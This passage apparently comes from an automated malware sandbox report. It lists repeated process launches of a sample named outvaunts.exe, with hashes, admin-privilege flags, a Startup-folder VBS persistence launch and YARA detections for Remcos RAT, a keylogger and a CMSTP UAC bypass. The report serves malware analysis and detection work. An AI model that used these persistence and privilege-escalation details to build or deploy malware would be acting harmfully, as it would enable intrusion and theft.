                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:14
                                                    Start time:01:05:07
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:15
                                                    Start time:01:05:07
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:16
                                                    Start time:01:05:08
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:17
                                                    Start time:01:05:09
                                                    Start date:10/12/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs"
                                                    Imagebase:0xff9b0000
                                                    File size:168'960 bytes
                                                    MD5 hash:045451FA238A75305CC26AC982472367
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:18
                                                    Start time:01:05:09
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:19
                                                    Start time:01:05:09
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:20
                                                    Start time:01:05:10
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:21
                                                    Start time:01:05:11
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:22
                                                    Start time:01:05:12
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:23
                                                    Start time:01:05:12
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:24
                                                    Start time:01:05:13
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:25
                                                    Start time:01:05:13
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:26
                                                    Start time:01:05:14
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:27
                                                    Start time:01:05:14
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:28
                                                    Start time:01:05:15
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    General

                                                    Target ID:29
                                                    Start time:01:05:15
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    General

                                                    Target ID:30
                                                    Start time:01:05:16
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
